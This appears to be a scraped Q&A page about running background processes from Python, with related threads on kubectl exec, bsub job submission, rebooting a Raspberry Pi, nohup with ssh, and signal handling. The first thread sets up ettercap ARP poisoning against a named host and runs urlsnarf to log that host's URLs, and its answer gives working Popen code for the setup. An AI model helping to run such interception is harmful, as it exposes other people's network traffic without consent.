Run console application in background - python

I am working on a script in python where first I set ettercap to ARP poisoning and then start urlsnarf to log the URLs. I want to have ettercap to start first and then, while poisoning, start urlsnarf. The problem is that these jobs must run at the same time and then urlsnarf show the output. So I thought it would be nice If I could run ettercap in background without waiting to exit and then run urlsnarf. I tried command nohup but at the time that urlsnarf had to show the url the script just ended. I run:
subprocess.call(["ettercap",
"-M ARP /192.168.1.254/ /192.168.1.66/ -p -T -q -i wlan0"])
But I get:
ettercap NG-0.7.4.2 copyright 2001-2005 ALoR & NaGA
MITM method ' ARP /192.168.1.254/ /192.168.1.66/ -p -T -q -i wlan0' not supported...
Which means that somehow the arguments were not passed correctly

You could use the subprocess module in the Python standard library to spawn ettercap as a separate process that will run simultaneously with the parent. Using the Popen class from subprocess you'll be able to spawn your ettercap process run your other processing and then kill the ettercap process when you are done. More info here: Python Subprocess Package
import shlex, subprocess
args = shlex.split("ettercap -M ARP /192.168.1.254/ /192.168.1.66/ -p -T -q -i wlan0")
ettercap = subprocess.Popen(args)
# program continues without waiting for ettercap process to finish.

Related

Running background process with kubectl exec

I am trying to execute a Python program as a background process inside a container with kubectl as below (kubectl issued on local machine):
kubectl exec -it <container_id> -- bash -c "cd some-dir && (python xxx.py --arg1 abc &)"
When I log in to the container and check ps -ef I do not see this process running. Also, there is no output from kubectl command itself.
Is the kubectl command issued correctly?
Is there a better way to achieve the same?
How can I see the output/logs printed off the background process being run?
If I need to stop this background process after some duration, what is the best way to do this?
The nohup Wikipedia page can help; you need to redirect all three IO streams (stdout, stdin and stderr) - an example with yes:
kubectl exec pod -- bash -c "yes > /dev/null 2> /dev/null &"
nohup is not required in the above case because I did not allocate a pseudo terminal (no -t flag) and the shell was not interactive (no -i flag) so no HUP signal is sent to the yes process on session termination. See this answer for more details.
Redirecting /dev/null to stdin is not required in the above case since stdin already refers to /dev/null (you can see this by running ls -l /proc/YES_PID/fd in another shell).
To see the output you can instead redirect stdout to a file.
To stop the process you'd need to identity the PID of the process you want to stop (pgrep could be useful for this purpose) and send a fatal signal to it (kill PID for example).
If you want to stop the process after a fixed duration, timeout might be a better option.
Actually, the best way to make this kind of things is adding an entry point to your container and run execute the commands there.
Like:
entrypoint.sh:
#!/bin/bash
set -e
cd some-dir && (python xxx.py --arg1 abc &)
./somethingelse.sh
exec "$#"
You wouldn't need to go manually inside every single container and run the command.

using os.system for multiple line commands

I am trying to run shell code from a python file to submit another python file to a computing cluster. The shell code is as follows:
#BSUB -J Proc[1]
#BSUB -e ~/logs/proc.%I.%J.err
#BSUB -o ~/logs/proc.%I.%J.out
#BSUB -R "span[hosts=1]"
#BSUB -n 1
python main.py
But when I run it from python like the following I can't get it to work:
from os import system
system('bsub -n 1 < #BSUB -J Proc[1];#BSUB -e ~/logs/proc.%I.%J.err;#BSUB -o ~/logs/proc.%I.%J.out;#BSUB -R "span[hosts=1]";#BSUB -n 1;python main.py')
Is there something I'm doing wrong here?
If I understand correctly, all the #BSUB stuff is text that should be fed to the bsub command as input; bsub is run locally, then runs those commands for you on the compute node.
In that case, you can't just do:
bsub -n 1 < #BSUB -J Proc[1];#BSUB -e ~/logs/proc.%I.%J.err;#BSUB -o ~/logs/proc.%I.%J.out;#BSUB -R "span[hosts=1]";#BSUB -n 1;python main.py
That's interpreted by the shell as "run bsub -n 1 and read from a file named OH CRAP A COMMENT STARTED AND NOW WE DON'T HAVE A FILE TO READ!"
You could fix this with MOAR HACKERY (using echo or here strings taking further unnecessary dependencies on shell execution). But if you want to feed stdin input, the best solution is to use a more powerful tool for the task, the subprocess module:
# Open a process (no shell wrapper) that we can feed stdin to
proc = subprocess.Popen(['bsub', '-n', '1'], stdin=subprocess.PIPE)
# Feed the command series you needed to stdin, then wait for process to complete
# Per Michael Closson, can't use semi-colons, bsub requires newlines
proc.communicate(b'''#BSUB -J Proc[1]
#BSUB -e ~/logs/proc.%I.%J.err
#BSUB -o ~/logs/proc.%I.%J.out
#BSUB -R "span[hosts=1]"
#BSUB -n 1
python main.py
''')
# Assuming the exit code is meaningful, check it here
if proc.returncode != 0:
# Handle a failed process launch here
This avoids a shell launch entirely (removing the issue with needing to deal with comment characters at all, along with all the other issues with handling shell metacharacters), and is significantly more explicit about what is being run locally (bsub -n 1) and what is commands being run in the bsub session (the stdin).
The #BSUB directives are parsed by the bsub binary, which doesn't support ; as a delimiter. You need to use newlines. This worked for me.
#!/usr/bin/python
import subprocess;
# Open a process (no shell wrapper) that we can feed stdin to
proc = subprocess.Popen(['bsub', '-n', '1'], stdin=subprocess.PIPE)
# Feed the command series you needed to stdin, then wait for process to complete
input="""#!/bin/sh
#BSUB -J mysleep
sleep 101
"""
proc.communicate(input);
*** So obviously I got the python code from #ShadowRanger. +1 his answer. I would have posted this as a comment to his answer if SO supported python code in a comment.

My Raspbian doesn't reboot via a Python application

I am desperately trying to find out a way to force my Raspberry Pi running Raspbian to restart when a certain condition is met (Python script), however I got no success so far...
I have tried the following statements by using popen:
sudo reboot -i -p
sudo reboot -f
sudo shutdown -r -f now
I thought the problem could be calling it through the Python application itself, therefore I wrote a small C program to kill all running Python application and then reboot, but no success...
My Raspberry is enough powered (Red LED is always on) and all commands I described above work fine when called directly from the command window.
Any help is appreciated!
Thanks,
EDITED:
Adding my python script as required:
from subprocess import Popen, PIPE
def reboot():
echo.echo("Rebooting...")
db.write_alarm(get_alarm_status())
upload.upload_log()
reboot_statement = "sudo shutdown -r -f now"
popen_args = reboot_statement.split(" ")
Popen(popen_args, stdout=PIPE, stderr=PIPE)
Try this:
create a file called reboot.py with the following contents:
import os
os.system("shutdown -r now")
then call it like this:
sudo python reboot.py
Assuming this works you can probably invoke your original script with sudo to get it to work.
You should pass shell=True id you want the shell to process the arguments
Popen("sudo shutdown -r -f now", stdout=PIPE, stderr=PIPE, shell=True)

python subprocess output on nohup

Trying to monitor the available physical disc space of a remote machine using a python script, which executes the df -h . command using subprocess.popen.
import subprocess
import time
command = 'ssh remoteserver "df -h ."'
while True:
proc = subprocess.Popen(command,shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output,err=proc.communicate()
print output
print err
time.sleep(60)
The script runs fine and prints the output to the terminal when run from command line
$> python2.7 script.py
Filesystem Size Used Avail Use% Mounted on
remoteserver:/home/user
555G 447G 109G 81% /home
The scripts does not produce any output or seems to be blocking when the script is started with nohup command.
$> nohup python2.7 script.py &
Would like the script to work and fetch the disc space of remote machine using the above script when started in nohup.
I'm not 100% sure of the underlying issue here, but when you invoke NOHUP in the shell, it's disconnected some of the STDIN/STDOUT from the terminal process, which I suspect it causing some of this interactions you're seeing.
Given that you're doing this from a remote machine, I'd actually recommend you look at using something like Fabric as a library to do what you're after. It's pretty straightforward, and does most of the handling of terminal sessions as well as closing things down nicely for you when you're complete.
something like:
from fabric import api
from fabric.api import env
import fabric
env.host_string = '%s#%s' % (username, remote_host)
env.disable_known_hosts = True
env.password = password
fabric.state.output['stdout'] = False
fabric.state.output['stderr'] = False
results = api.run('df -h')
You might try sending stdin=subprocess.PIPE to the subprocess command, then calling proc.stdin.close() on the next line, before the communicate() call. Or you can try changing the command to 'ssh remoteserver "df -h ." </dev/null'. Others report using FNULL = open(os.devnull, 'r') and passing in FNULL to the stdin= argument, but I'm not sure if you need to call FNULL.close() after or not.
SSH is most likely waiting for input for some reason when it is run from nohup. Perhaps it is unable to authenticate in the nohup environment and is asking for password input?
To make sure SSH is not waiting for input, try adding -o "BatchMode yes" to the ssh command and see if there are some clues in the output/error from the subprocess communicate call.

Exit a Python process not kill it (via ssh)

I am starting my script locally via:
sudo python run.py remote
This script happens to also open a subprocess (if that matters)
webcam = subprocess.Popen('avconv -f video4linux2 -s 320x240 -r 20 -i /dev/video0 -an -metadata title="OfficeBot" -f flv rtmp://6f7528a4.fme.bambuser.com/b-fme/xxx', shell = True)
I want to know how to terminate this script when I SSH in.
I understand I can do:
sudo pkill -f "python run.py remote"
or use:
ps -f -C python
to find the process ID and kill it that way.
However none of these gracefully kill the process, I want to able to trigger the equilivent of CTRL/CMD C to register an exit command (I do lots of things on shutdown that aren't triggered when the process is simply killed).
Thank you!
You should use "signals" for it:
http://docs.python.org/2/library/signal.html
Example:
import signal, os
def handler(signum, frame):
print 'Signal handler called with signal', signum
signal.signal(signal.SIGINT, handler)
#do your stuff
then in terminal:
kill -INT $PID
or ctrl+c if your script is active in current shell
http://en.wikipedia.org/wiki/Unix_signal
also this might be useful:
How do you create a daemon in Python?
You can use signals for communicating with your process. If you want to emulate CTRL-C the signal is SIGINT (which you can raise by kill -INT and process id. You can also modify the behavior for SIGTERM which would make your program shut down cleanly under a broader range of circumstances.

Categories